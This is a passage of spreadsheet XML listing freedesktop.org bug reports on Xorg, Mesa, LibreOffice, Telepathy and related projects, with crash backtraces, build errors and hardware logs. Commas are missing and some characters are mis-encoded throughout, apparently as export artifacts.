	[16] -1	0	0x0000e000 - 0x0000e0ff (0x100) IX[B]E
	[17] -1	0	0x0000dc00 - 0x0000dcff (0x100) IX[B]E
	[18] -1	0	0x0000d800 - 0x0000d8ff (0x100) IX[B]E
	[19] -1	0	0x0000d400 - 0x0000d4ff (0x100) IX[B]E
	[20] -1	0	0x0000d000 - 0x0000d0ff (0x100) IX[B]E
	[21] -1	0	0x0000c000 - 0x0000c0ff (0x100) IX[B](B)
	[22] 0	0	0x000003b0 - 0x000003bb (0xc) IS[B](OprU)
	[23] 0	0	0x000003c0 - 0x000003df (0x20) IS[B](OprU)
(==) RADEON(0): Write-combining range (0xdd0000000x80000) was already clear
(==) RADEON(0): Write-combining range (0xd00000000x2000000)
(==) RADEON(0): Write-combining range (0xa00000x10000) was already clear
(==) RADEON(0): Using 16 bit depth buffer
(II) RADEON(0): RADEONInitMemoryMap() : 
(II) RADEON(0):   mem_size         : 0x04000000
(II) RADEON(0):   MC_FB_LOCATION   : 0xd3ffd000
(II) RADEON(0):   MC_AGP_LOCATION  : 0xffffffc0
(II) RADEON(0): Depth moves disabled by default
(II) RADEON(0): CP in BM mode
(II) RADEON(0): Using 8 MB GART aperture
(II) RADEON(0): Using 1 MB for the ring buffer
(II) RADEON(0): Using 2 MB for vertex/indirect buffers
(II) RADEON(0): Using 5 MB for GART textures
(II) RADEON(0): Memory manager initialized to (00) (12808191)
(II) RADEON(0): Reserved area from (01200) to (12801202)
(II) RADEON(0): Largest offscreen area available: 1280 x 6989
(II) RADEON(0): Will use front buffer at offset 0x0
(II) RADEON(0): Will use back buffer at offset 0x924000
(II) RADEON(0): Will use depth buffer at offset 0xc12000
(II) RADEON(0): Will use 17408 kb for textures at offset 0xf00000
drmOpenDevice: node name is /dev/dri/card0
drmOpenDevice: open result is 7 (OK)
drmOpenDevice: node name is /dev/dri/card0
drmOpenDevice: open result is 7 (OK)
drmOpenByBusid: Searching for BusID pci:0000:01:00.0
drmOpenDevice: node name is /dev/dri/card0
drmOpenDevice: open result is 7 (OK)
drmOpenByBusid: drmOpenMinor returns 7
drmOpenByBusid: drmGetBusid reports pci:0000:01:00.0
(II) [drm] DRM interface version 1.2
(II) [drm] DRM open master succeeded.
(II) RADEON(0): [drm] Using the DRM lock SAREA also for drawables.
(II) RADEON(0): [drm] framebuffer handle = 0xd0000000
(II) RADEON(0): [drm] added 1 reserved context for kernel
(II) RADEON(0): X context handle = 0x1
(II) RADEON(0): [drm] installed DRM signal handler
(==) RADEON(0): Using AGP 4x
(II) RADEON(0): [agp]</t>
  </si>
  <si>
    <t>ls.colby</t>
  </si>
  <si>
    <t>SYSTEMD-74157</t>
  </si>
  <si>
    <t>bash-completion/localectl: argument after set-locale is incorrect</t>
  </si>
  <si>
    <t>Steps to reproduce
1. Write localectl set-locale in term
2. try to use 
Actual results:
As first argument we can choose from locales like this:
$ localectl set-locale 
Display all 807 possibilities? (y or n)
Expected results:
As first argument we can choose from locale vars (according to locale(7)) like this:
$ localectl set-locale
LC_COLLATE= LC_CTYPE= LC_MONETARY= LC_MESSAGES= LC_NUMERIC= LC_TIME= LC_ALL=
Additional info:
set-locale LOCALE...
           Set the system locale. This takes one or more assignments such as LANG=de_DE.utf8 LC_MESSAGES=en_GB.utf8 and so on. See locale(7) for details on the
           available settings and their meanings. Use list-locales for a list of available locales (see below).</t>
  </si>
  <si>
    <t>i.gnatenko.brain</t>
  </si>
  <si>
    <t>TELEPATHY-29943</t>
  </si>
  <si>
    <t>Make TpDebugSender's g_log handler thread safe</t>
  </si>
  <si>
    <t>It currently isn't thread safe. So if g_debug or g_warning or g_something_else is called from another thread it is very likely to crash!</t>
  </si>
  <si>
    <t>PYCAIRO-76759</t>
  </si>
  <si>
    <t>[regression] build failure using python 3.4.0m</t>
  </si>
  <si>
    <t>I've tried to build pycairo 1.10.0 or today's git master with the same result.  I export several variables so that the correct version of python is found (I have 2.7 and 3.4 installed):
export PYTHON:=$(bindir)/python3
export PYVER:=3.4
export PYTHONPATH:=$(libdir)/python$(PYVER)/site-packages:$(libdir)/python$(PYVER)
export LIBPATH_PYEMBED:=$(PYTHONPATH)
and then run
$(PYTHON) ./waf configure --prefix=$(prefix)
(actually all this is done using a makefile).
I get:
  ./options()
Setting top to                           : /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git 
Setting out to                           : /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git/build_directory 
  ./configure()
Checking for 'gcc' (c compiler)          : /usr/bin/gcc 
Checking for program python              : /opt/garnome-3.12.0/bin/python3 
Checking for python version              : (3 4 0 'final' 0) 
Checking for library python3.4 in LIBPATH_PYEMBED : Traceback (most recent call last):
  File /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git/.waf3-1.7.8-77e2cdd38ea2930f982e3aabf335fdb7/waflib/Scripting.py line 97 in waf_entry_point
    run_commands()
  File /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git/.waf3-1.7.8-77e2cdd38ea2930f982e3aabf335fdb7/waflib/Scripting.py line 153 in run_commands
    ctx=run_command(cmd_name)
  File /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git/.waf3-1.7.8-77e2cdd38ea2930f982e3aabf335fdb7/waflib/Scripting.py line 146 in run_command
    ctx.execute()
  File /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git/.waf3-1.7.8-77e2cdd38ea2930f982e3aabf335fdb7/waflib/Configure.py line 128 in execute
    super(ConfigurationContextself).execute()
  File /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git/.waf3-1.7.8-77e2cdd38ea2930f982e3aabf335fdb7/waflib/Context.py line 87 in execute
    self.recurse([os.path.dirname(g_module.root_path)])
  File /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git/.waf3-1.7.8-77e2cdd38ea2930f982e3aabf335fdb7/waflib/Context.py line 128 in recurse
    user_function(self)
  File /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git/wscript line 36 in configure
    ctx.check_python_headers()
  File /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git/.waf3-1.7.8-77e2cdd38ea2930f982e3aabf335fdb7/waflib/Configure.py line 224 in fun
    return f(*k**kw)
  File /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git/.waf3-1.7.8-77e2cdd38ea2930f982e3aabf335fdb7/waflib/Tools/python.py line 177 in check_python_headers
    result=conf.check(lib=nameuselib='PYEMBED'libpath=pathmandatory=Falsemsg='Checking for library %s in LIBPATH_PYEMBED'%name)
  File /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git/.waf3-1.7.8-77e2cdd38ea2930f982e3aabf335fdb7/waflib/Configure.py line 224 in fun
    return f(*k**kw)
  File /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git/.waf3-1.7.8-77e2cdd38ea2930f982e3aabf335fdb7/waflib/Tools/c_config.py line 376 in check
    ret=self.run_c_code(*k**kw)
  File /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git/.waf3-1.7.8-77e2cdd38ea2930f982e3aabf335fdb7/waflib/Configure.py line 224 in fun
    return f(*k**kw)
  File /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git/.waf3-1.7.8-77e2cdd38ea2930f982e3aabf335fdb7/waflib/Tools/c_config.py line 460 in run_c_code
    bld.compile()
  File /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git/.waf3-1.7.8-77e2cdd38ea2930f982e3aabf335fdb7/waflib/Build.py line 196 in compile
    self.store()
  File /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git/.waf3-1.7.8-77e2cdd38ea2930f982e3aabf335fdb7/waflib/Utils.py line 386 in f
    ret=fun(*k**kw)
  File /home/ronis/Project/notar/GNOME/garnome/svn/pycairo/work/main.d/pycairo-git/.waf3-1.7.8-77e2cdd38ea2930f982e3aabf335fdb7/waflib/Build.py line 170 in store
    cPickle.dump(dataf-1)
_pickle.PicklingError: Can't pickle .node_class'&gt;: attribute lookup Context.__init__..node_class on waflib.Node failed</t>
  </si>
  <si>
    <t>MEDIA-PLAYER-INFO-30728</t>
  </si>
  <si>
    <t>Add HTC Legend phone</t>
  </si>
  <si>
    <t>Created attachment 39302
patch
See attached patch thanks</t>
  </si>
  <si>
    <t>XORG-2853</t>
  </si>
  <si>
    <t>dlloader and recent freetype fail on non glibc systems</t>
  </si>
  <si>
    <t>The latest X.Org code probably after the import of freetype 2.1.9 fails
with 'undefined symbol xf86setjmp0'  while loading libfreetype.so on OpenBSD 
(and probably on other non-glibc systems)
Attached below is a proposed patch</t>
  </si>
  <si>
    <t>MESA-52054</t>
  </si>
  <si>
    <t>gallium/opencl doesnt support includes for opencl kernels</t>
  </si>
  <si>
    <t>when running tests for opencl enabled jtr (http://www.openwall.com/john/)
i get following error
OpenCL platform 0: Default 1 device(s).
Using device 0: AMD JUNIPER
1 error generated.
Compilation log: cl_input:17:10: fatal error: 'opencl_rar.h' file not found
#include opencl_rar.h
         ^
OpenCL error (CL_INVALID_PROGRAM_EXECUTABLE) in file (rar_fmt.c) at line (588) - (Error creating kernel. Double-check kernel name?)
xeon ~ # ./clInfo 
Found 1 platform(s).
platform[(nil)]: profile: FULL_PROFILE
platform[(nil)]: version: OpenCL 1.1 MESA 
platform[(nil)]: name: Default
platform[(nil)]: vendor: Mesa
platform[(nil)]: extensions: 
platform[(nil)]: Found 1 device(s).
        device[0xc82360]: NAME: AMD JUNIPER
        device[0xc82360]: VENDOR: X.Org
        device[0xc82360]: PROFILE: FULL_PROFILE
        device[0xc82360]: VERSION: OpenCL 1.1 MESA 
        device[0xc82360]: EXTENSIONS: 
        device[0xc82360]: DRIVER_VERSION: 
        device[0xc82360]: Type: GPU 
        device[0xc82360]: EXECUTION_CAPABILITIES: Kernel 
        device[0xc82360]: GLOBAL_MEM_CACHE_TYPE: None (0)
        device[0xc82360]: CL_DEVICE_LOCAL_MEM_TYPE: Local (1)
        device[0xc82360]: SINGLE_FP_CONFIG: 0x7
        device[0xc82360]: QUEUE_PROPERTIES: 0x2
        device[0xc82360]: VENDOR_ID: 4098
        device[0xc82360]: MAX_COMPUTE_UNITS: 1
        device[0xc82360]: MAX_WORK_ITEM_DIMENSIONS: 3
        device[0xc82360]: MAX_WORK_GROUP_SIZE: 256
        device[0xc82360]: PREFERRED_VECTOR_WIDTH_CHAR: 16
        device[0xc82360]: PREFERRED_VECTOR_WIDTH_SHORT: 8
        device[0xc82360]: PREFERRED_VECTOR_WIDTH_INT: 4
        device[0xc82360]: PREFERRED_VECTOR_WIDTH_LONG: 2
        device[0xc82360]: PREFERRED_VECTOR_WIDTH_FLOAT: 4
        device[0xc82360]: PREFERRED_VECTOR_WIDTH_DOUBLE: 2
        device[0xc82360]: MAX_CLOCK_FREQUENCY: 0
        device[0xc82360]: ADDRESS_BITS: 32
        device[0xc82360]: MAX_MEM_ALLOC_SIZE: 0
        device[0xc82360]: IMAGE_SUPPORT: 1
        device[0xc82360]: MAX_READ_IMAGE_ARGS: 32
        device[0xc82360]: MAX_WRITE_IMAGE_ARGS: 32
        device[0xc82360]: IMAGE2D_MAX_WIDTH: 32768
        device[0xc82360]: IMAGE2D_MAX_HEIGHT: 32768
        device[0xc82360]: IMAGE3D_MAX_WIDTH: 32768
        device[0xc82360]: IMAGE3D_MAX_HEIGHT: 32768
        device[0xc82360]: IMAGE3D_MAX_DEPTH: 32768
        device[0xc82360]: MAX_SAMPLERS: 16
        device[0xc82360]: MAX_PARAMETER_SIZE: 1024
        device[0xc82360]: MEM_BASE_ADDR_ALIGN: 128
        device[0xc82360]: MIN_DATA_TYPE_ALIGN_SIZE: 128
        device[0xc82360]: GLOBAL_MEM_CACHELINE_SIZE: 0
        device[0xc82360]: GLOBAL_MEM_CACHE_SIZE: 0
        device[0xc82360]: GLOBAL_MEM_SIZE: 201326592
        device[0xc82360]: MAX_CONSTANT_BUFFER_SIZE: 65536
        device[0xc82360]: MAX_CONSTANT_ARGS: 1
        device[0xc82360]: LOCAL_MEM_SIZE: 32768
        device[0xc82360]: ERROR_CORRECTION_SUPPORT: 0
        device[0xc82360]: PROFILING_TIMER_RESOLUTION: 0
        device[0xc82360]: ENDIAN_LITTLE: 1
        device[0xc82360]: AVAILABLE: 1
        device[0xc82360]: COMPILER_AVAILABLE: 1</t>
  </si>
  <si>
    <t>alexxy</t>
  </si>
  <si>
    <t>DRI-110132</t>
  </si>
  <si>
    <t>[CI][SHARDS] igt@kms_plane@pixel-format-pipe-b-planes - fail - Starting subtest: pixel-format-pipe-B-planes WARNING: CRC mismatch with format YUYV(0x56595559) on B.1</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_5746/shard-skl2/igt@kms_plane@pixel-format-pipe-b-planes.html
Starting subtest: pixel-format-pipe-B-planes
(kms_plane:1154) WARNING: CRC mismatch with format YUYV(0x56595559) on B.1
(kms_plane:1154) WARNING: CRC mismatch with format YUYV(0x56595559) on B.1
(kms_plane:1154) WARNING: CRC mismatch with format YVYU(0x55595659) on B.1
(kms_plane:1154) WARNING: CRC mismatch with format YVYU(0x55595659) on B.1
(kms_plane:1154) WARNING: CRC mismatch with format UYVY(0x59565955) on B.1
(kms_plane:1154) WARNING: CRC mismatch with format UYVY(0x59565955) on B.1
(kms_plane:1154) WARNING: CRC mismatch with format VYUY(0x59555956) on B.1
(kms_plane:1154) WARNING: CRC mismatch with format VYUY(0x59555956) on B.1</t>
  </si>
  <si>
    <t>LIBREOFFICE-53175</t>
  </si>
  <si>
    <t>FILEOPEN error reading â€œContent (TOC)â€ from a DOCX</t>
  </si>
  <si>
    <t>Created attachment 65189
Bad DOCX file
LibreOffice:
Version 3.7.0.0.alpha0+ (Build ID: 76ccb5f)
Version 3.6.1.0+ (Build ID: eb42588)
Version 3.5.7.0+ - I think
---
Description:
a) Open the file DOC-export footnote Error.odt (see attachment 57017) and saved it as a Office Open XML text document (Microsoft Office 2007/2010) DOC-export footnote Error.docx.
b) Open DOCX-file programs Microsoft Word â€“ all correct.
c) Open DOC-export footnote Error.docx by LibO Writer and then closed it. LibO post message: The document ... has been modified. Do you want to save your changes? &gt; Push the Save button. (This file named DOCX_import_TOC_export.docx is into attachment.)
d) Open the saved file by Microsoft Office. WinWord says: Cannot open file due to errors of its contents. Details: Unspecified error. Location: Part:/word/document.xml Line: 2 Column: 6136.
--
@Cedric:
It seems to me that it is symmetric error reading â€œContent (TOC)â€ from a DOCX file which remained after the bug 52610 fixation.</t>
  </si>
  <si>
    <t>XORG-49063</t>
  </si>
  <si>
    <t>Gnome shell freezes when scrolling in the firefox or viewing a high resolution picture</t>
  </si>
  <si>
    <t>I have a ati mobility radeon x1400 in gnome 2 I had no problem using my card but in gnome shell or gnome 2 with 3D effects my desktop freezes when I'm schooling in the firefox or viewing a high resolution picture.
I solved this problem by disabling EXAPixmaps via xorg.conf. I'm using LMDE right know but I have faced this problem in different distroes like ubuntu archlinux and chakra.
I've found some other people like me in the archlinux forum:
https://bbs.archlinux.org/viewtopic.php?id=129481&amp;p=1
please contact me if you want more info.</t>
  </si>
  <si>
    <t>shayanmansuri</t>
  </si>
  <si>
    <t>PIGLIT-63952</t>
  </si>
  <si>
    <t>Created attachment 78509
GPG Public Key</t>
  </si>
  <si>
    <t>fabianbieler</t>
  </si>
  <si>
    <t>TELEPATHY-42706</t>
  </si>
  <si>
    <t>Crash when a Ytstenut service is running when Gabble signs in.</t>
  </si>
  <si>
    <t>Steps to reproduce:
â€¢ Have a Gabble connection online with the Ytstenut plugin
â€¢ Start two Ytstenut services (say server-client-pong twice)
â€¢ Set your status to offline
â€¢ Set your status back online.
(telepathy-gabble:22633): gabble-DEBUG: gabble_connection_update_capabilities (connection.c:3491): client org.freedesktop.Telepathy.Client.Vinagre has no interesting data forms
(telepathy-gabble:22633): gabble-DEBUG: gabble_media_factory_add_caps (media-factory.c:1016): Client org.freedesktop.Telepathy.Client.Ytsenut.Client.lit.sp.hidere._3a1_2e5055.n0 media capabilities:
(telepathy-gabble:22633): wocky-DEBUG: data_form_parse_form_field: wocky-data-form.c:543: parsed field 'FORM_TYPE' of type hidden
(telepathy-gabble:22633): wocky-DEBUG: data_form_parse_form_field: wocky-data-form.c:543: parsed field 'type' of type text-single
(telepathy-gabble:22633): gabble-DEBUG: gabble_connection_update_capabilities (connection.c:3460): client org.freedesktop.Telepathy.Client.Ytsenut.Client.lit.sp.hidere._3a1_2e5055.n0 contributes:
  --begin--
  Feature: urn:ytstenut:service#lit.sp.hidere
  --end--
(telepathy-gabble:22633): gabble-DEBUG: gabble_connection_update_capabilities (connection.c:3481): client org.freedesktop.Telepathy.Client.Ytsenut.Client.lit.sp.hidere._3a1_2e5055.n0 contributes 1 data form:
Program received signal SIGSEGV Segmentation fault.
0x00007ffff55a5ed8 in main_arena () from /lib/x86_64-linux-gnu/libc.so.6
#0  0x00007ffff55a5ed8 in main_arena () from /lib/x86_64-linux-gnu/libc.so.6
#1  0x00007ffff55df6f3 in g_hash_table_lookup_node (hash_return= key=0x520eab hash_table=0x7ffff55a5eb8)
    at /build/buildd-glib2.0_2.30.1-2-amd64-0upKKE/glib2.0-2.30.1/./glib/ghash.c:360
#2  g_hash_table_lookup (hash_table=0x7ffff55a5eb8 key=0x520eab)
    at /build/buildd-glib2.0_2.30.1-2-amd64-0upKKE/glib2.0-2.30.1/./glib/ghash.c:1022
#3  0x000000000047da24 in get_form_type (form=) at connection.c:3264
#4  0x000000000047e867 in gabble_connection_update_capabilities (iface= clients=0x15db760 context=0x160b220)
    at connection.c:3484
#5  0x00007ffff79c24a8 in invoke_object_method (message=0x159cc70 connection=0x79d1b0 method=0x7ffff6ca3c20 
    object_info=0x7ffff6ca20e0 object=0x7ce160) at dbus-gobject.c:1889
#6  object_registration_message (connection=0x79d1b0 message=0x159cc70 user_data=) at dbus-gobject.c:2151
#7  0x00007ffff778d3c1 in ?? () from /lib/x86_64-linux-gnu/libdbus-1.so.3
#8  0x00007ffff777f2c0 in dbus_connection_dispatch () from /lib/x86_64-linux-gnu/libdbus-1.so.3
#9  0x00007ffff79bf735 in message_queue_dispatch (source= callback= user_data=)
    at dbus-gmain.c:90
#10 0x00007ffff55f11ad in g_main_dispatch (context=0x7a0020)
    at /build/buildd-glib2.0_2.30.1-2-amd64-0upKKE/glib2.0-2.30.1/./glib/gmain.c:2425
#11 g_main_context_dispatch (context=0x7a0020) at /build/buildd-glib2.0_2.30.1-2-amd64-0upKKE/glib2.0-2.30.1/./glib/gmain.c:2995
#12 0x00007ffff55f19a8 in g_main_context_iterate (context=0x7a0020 block= dispatch=1 self=)
    at /build/buildd-glib2.0_2.30.1-2-amd64-0upKKE/glib2.0-2.30.1/./glib/gmain.c:3073
#13 0x00007ffff55f1ee2 in g_main_loop_run (loop=0x7a6110)
    at /build/buildd-glib2.0_2.30.1-2-amd64-0upKKE/glib2.0-2.30.1/./glib/gmain.c:3281
#14 0x00007ffff6a0226f in tp_run_connection_manager (prog_name= version= construct_cm= 
    argc= argv=) at run.c:285
#15 0x000000000043726a in gabble_main (argc=1 argv=0x7fffffffe3f8) at gabble.c:177
#16 0x00007ffff5244ead in __libc_start_main (main= argc= ubp_av= init= 
    fini= rtld_fini= stack_end=0x7fffffffe3e8) at libc-start.c:228
#17 0x0000000000436e99 in _start ()
I have no idea what a main arena is. Poking around a little in gdb suggests that the WockyDataForm object and the hash table in its 'fields' field are valid maybe the contents of the hash table are not?</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-1118</t>
  </si>
  <si>
    <t>Java JNLP mime type</t>
  </si>
  <si>
    <t>Sun provides a protocol called JNLP (or Java Network Launching Protocol) which
allows one to launch Java applications over the network using a simple XML file.
The file ends with .jnlp and it's mime type is application/x-java-jnlp-file.
A good text description would be Java Network Launched Application or some such.
The files don't seem to have a proper DOCTYPE or XML name space. However the
root element is jnlp. They can have a XML prolog.</t>
  </si>
  <si>
    <t>XORG-22483</t>
  </si>
  <si>
    <t>[865G] Random freezes with intel 2.7.99.901</t>
  </si>
  <si>
    <t>Created attachment 27142
intel_gpu_dump
00:02.0 VGA compatible controller: Intel Corporation 82865G Integrated Graphics
Controller (rev 02)
linux: 2.6.30-10-generic 
xserver: 2:1.6.1.901+git20090622+server1.6-branch.dbac41b6-0ubuntu0sarvatt~jaunty
intel: 2:2.7.99.901+git20090619.534e73ad-0ubuntu0sarvatt2~jaunty
libdrm: 2.4.11+git20090519.f355ad89-0ubuntu0sarvatt~jaunty
mesa: 7.5.0~git20090622+mesa-7-5-branch.abfd56c2-0ubuntu0sarvatt
Using 865G I get about three freezes in one day. Mostly when using some OpenGL apps but also after leaving the pc idle some minutes don't know exactly how much time.
After the freeze there is no useful log but I attached the output from intel_gpu_dump. Also my xorg.conf has only Option DontZap False.</t>
  </si>
  <si>
    <t>TELEPATHY-46513</t>
  </si>
  <si>
    <t>Make Jingle code less Telepathic</t>
  </si>
  <si>
    <t>In preparation for potentially moving the non-Telepathy-specific Jingle code down into Wocky in the future I have prepared an absurdly large branch to remove uses of telepathy-glib (and for that matter Gabble API) from pretty much all of the Jingle-flavoured classes.
I'm sorry it's so big and I'm also sorry that it doesn't end with a commit which actually moves the code to Wocky but there we go.</t>
  </si>
  <si>
    <t>PORTLAND-91990</t>
  </si>
  <si>
    <t>xdg-email: bashism: relies on bash's echo in run_thunderbird()</t>
  </si>
  <si>
    <t>Created attachment 118233
fix-bashism-use-of-echo.patch
xdg-email relies on bash's echo behaviour (specifically the -e option) in run_thunderbird(). It doesn't work with dash. The attached patch from Debian replaces the echo calls with /bin/echo which does support -e.</t>
  </si>
  <si>
    <t>MESA-94091</t>
  </si>
  <si>
    <t>Tonga unreal elemental segfault since radeonsi: put image fmask and sampler descriptors into one array</t>
  </si>
  <si>
    <t>Created attachment 121675
gdb bt
R9285 since mesa commit below Unreal ElementalDemo quits at start with a segfault.
gdb from demo generated core attached
commit 7aedbbacae6d3ec3d06735fff2eb662964773ad2
Author: Marek OlÅ¡Ã¡k 
Date:   Sat Feb 6 22:09:45 2016 +0100
    radeonsi: put image fmask and sampler descriptors into one array
    The texture slot is expanded to 16 dwords containing 2 descriptors.
    Those can be:
    - Image and fmask or
    - Image and sampler state
    By carefully choosing the locations we can put all three into one slot
    with the fmask and sampler state being mutually exclusive.
    This improves shaders in 2 ways:
    - 2 user SGPRs are unused shaders can use them as temporary registers now
    - each pair of descriptors is always on the same cache line
    v2: cosmetic changes: add back v8i32 don't load a sampler state &amp; fmask
        at the same time</t>
  </si>
  <si>
    <t>POPPLER-98786</t>
  </si>
  <si>
    <t>evince crashes on document reload</t>
  </si>
  <si>
    <t>Created attachment 128073
ParkoszLatinPolish1.pdf
Forwarding from https://bugs.debian.org/809388
The attached file will occasionally crash evince when it is being reloaded.  You can reproduce this by opening the file in evince and hold down Ctrl-R.  Evince should crash within a couple minutes.  Or set the environment variable G_SLICE=debug-blocks before running evince to have it immediately abort with the message attempt to release non-allocated block.</t>
  </si>
  <si>
    <t>MESA-31837</t>
  </si>
  <si>
    <t>Valgrind error due to alpha channel being left uninitialized when sampling 24bit RGB textures</t>
  </si>
  <si>
    <t>This comes from https://bugzilla.mozilla.org/show_bug.cgi?id=588918 see especially comments 16 and 18 there.
I have only tried with Mesa 7.8. Source code references below are against Mesa 7.8.2.
*** Description of the problem ***
Running under valgrind a program that does a glDrawArrays call using a GL_RGB8 texture I get this error:
==14218== Conditional jump or move depends on uninitialised value(s)
==14218==    at 0x2111134F: _mesa_convert_colors (image.c:5421)
==14218==    by 0x21176CBA: convert_color_type (s_span.c:941)
==14218==    by 0x211784B4: _swrast_write_rgba_span (s_span.c:1226)
==14218==    by 0x21187818: general_triangle (s_tritemp.h:819)
==14218==    by 0x21153E6C: _tnl_render_triangles_verts (t_vb_rendertmp.h:184)
==14218==    by 0x211554B1: run_render (t_vb_render.c:320)
==14218==    by 0x2114D5F6: _tnl_run_pipeline (t_pipeline.c:153)
==14218==    by 0x2114E262: _tnl_draw_prims (t_draw.c:478)
==14218==    by 0x2114E340: _tnl_vbo_draw_prims (t_draw.c:384)
==14218==    by 0x21146FB0: vbo_exec_DrawArrays (vbo_exec_array.c:524)
==14218==    by 0x5A81AC8: mozilla::gl::GLContext::fDrawArrays(unsigned int
int int) (GLContext.h:1185)
==14218==    by 0x5A670B0: mozilla::WebGLContext::DrawArrays(unsigned int int
int) (WebGLContextGL.cpp:1075)
==14218==  Uninitialised value was created by a stack allocation
==14218==    at 0x211699D8: fetch_texel (prog_execute.c:373)
Stepping in GDB through fetch_texel() I arrive at this location:
   opt_sample_rgb_2d at swrast/s_texfilter.c:1366
The code there does:
   for (k=0 k&lt;n k++) {
      GLint i = IFLOOR(texcoords[k][0] * width) 
      GLint j = IFLOOR(texcoords[k][1] * height) 
      GLint pos = (j &lt;&lt; shift) | i
      GLubyte *texel = ((GLubyte *) img-&gt;Data) + 3*pos
      rgba[k][RCOMP] = UBYTE_TO_FLOAT(texel[2])
      rgba[k][GCOMP] = UBYTE_TO_FLOAT(texel[1])
      rgba[k][BCOMP] = UBYTE_TO_FLOAT(texel[0])
   }
It seems that it's leaving the alpha channel uninitialized.
When we look at the location of the first reported valgrind error using that
uninitialized value _mesa_convert_colors (image.c:5421) the source code is:
   case GL_FLOAT:
      if (dstType == GL_UNSIGNED_BYTE) {
         const GLfloat (*src4)[4] = (const GLfloat (*)[4]) src
         GLubyte (*dst1)[4] = (GLubyte (*)[4]) (useTemp ? tempBuffer : dst)
         GLuint i
         for (i = 0 i &lt; count i++) {
            if (!mask || mask[i]) {
               UNCLAMPED_FLOAT_TO_UBYTE(dst1[i][RCOMP] src4[i][RCOMP])
               UNCLAMPED_FLOAT_TO_UBYTE(dst1[i][GCOMP] src4[i][GCOMP])
               UNCLAMPED_FLOAT_TO_UBYTE(dst1[i][BCOMP] src4[i][BCOMP])
               UNCLAMPED_FLOAT_TO_UBYTE(dst1[i][ACOMP] src4[i][ACOMP])
            }
         }
         if (useTemp)
            memcpy(dst tempBuffer count * 4 * sizeof(GLubyte))
      }
The error line 5421 is the one converting the alpha channel:
               UNCLAMPED_FLOAT_TO_UBYTE(dst1[i][ACOMP] src4[i][ACOMP])
This confirms the theory that the valgrind error is caused by the alpha value here being uninitialized.</t>
  </si>
  <si>
    <t>bjacob</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-8805</t>
  </si>
  <si>
    <t>Lock modifier in jp layout</t>
  </si>
  <si>
    <t>On Japanese PC keyboard Caps Lock is engraved at the Eisu key (Left of A
key) with shift modifier (upper side).  On Windows we can toggle the Lock state
with Shift + Eisu key (Leaf of A key).
xkbdesc/symbols/jp has correct symbol with  key [ Eisu_toggle Caps_Lock ].
But pressing shift+ doesn't toggle the lock state.  How can we fix this?
I've tested this with current xkbdesc from CVS.</t>
  </si>
  <si>
    <t>LIBREOFFICE-37543</t>
  </si>
  <si>
    <t>WIKIHELP: Two obsoleted pages from OOo - also LOCALHELP</t>
  </si>
  <si>
    <t>In Wikihelp there are two obsoleted pages from OOo times:
http://help.libreoffice.org/Common/Start-up_Wizard
http://help.libreoffice.org/Common/Registration
which should be deleted.
Please also check tons of WhatLinksHere for these two pages which should be deleted too.
http://help.libreoffice.org/Special:WhatLinksHere/Common/Start-up_Wizard
http://help.libreoffice.org/Special:WhatLinksHere/Common/Registration
Thanks</t>
  </si>
  <si>
    <t>MESA-48702</t>
  </si>
  <si>
    <t>copypix demo not working correctly on nv43</t>
  </si>
  <si>
    <t>Same setup as in bug 48701:
kernel: commit 965a47fb8ec0a72324aad8b9c0bd1c8b98cc7ca1 (3.4.0-rc2 nouveau
master branch up to drm/nouveau/bios: fix regression on some nv4x board)
mesa: commit b2df031a959f36743527b9abc89913ce4f895de3 (r300/compiler: Fix
nested flow control in r500 vertex shaders)
libdrm: master branch commit 292da616fe1f936ca78a3fa8e1b1b19883e343b6
(nouveau: pull in major libdrm rewrite)
ddx: master up to commit fb3a36b1e5af0f81bb266da894d3442eed8e4e55 (nve0:
initial exa/xv acceleration for kepler chipsets)
X server - 1.10.4
Hardware:
01:00.0 VGA compatible controller: NVIDIA Corporation NV43 [GeForce 6600 GT]
(rev a2) - AGP version.
trying copypix mesa demo i see difference between llvmpipe and nouveau/gallium drivers. See screenshots.</t>
  </si>
  <si>
    <t>TELEPATHY-35395</t>
  </si>
  <si>
    <t>GabbleServerTLSManager leaks priv-&gt;peername and priv-&gt;tls_session</t>
  </si>
  <si>
    <t>GabbleServerTLSManager leaks priv-&gt;peername and priv-&gt;tls_session. Patch coming.</t>
  </si>
  <si>
    <t>LIBREOFFICE-34064</t>
  </si>
  <si>
    <t>Need better handle the Drop Down Form Field in .doc file.</t>
  </si>
  <si>
    <t>Created attachment 43155
test data
Platform: SLED 11 sp1 i586
build info: Novell LibreOffice 3.3 rc4
[Steps]
    1. Open the doc attached
    2. Click the field a dropdown list with some items will come out
[Problem]
    There are several problems here:
    [UI]
    1. The 'Cancel' label(button?) on the bottom right corner is truncated in
    the panel UI
    2. The drop down list panel can not be canceled by either clicking
    'Cancel' label(button?) or otherwhere else.
    3. Choosing one of those items in the list the field will be expanded as
    an empty gray area without text shown out.
    [load/save]
    4. The changing of value cannot be rememeber if you save the document and
    reopen it.
    5. When changing the field value the document is not marked as dirty
    [localization]
    6. The 'Cancel' lable(button?) cannot be localized</t>
  </si>
  <si>
    <t>LIBREOFFICE-75004</t>
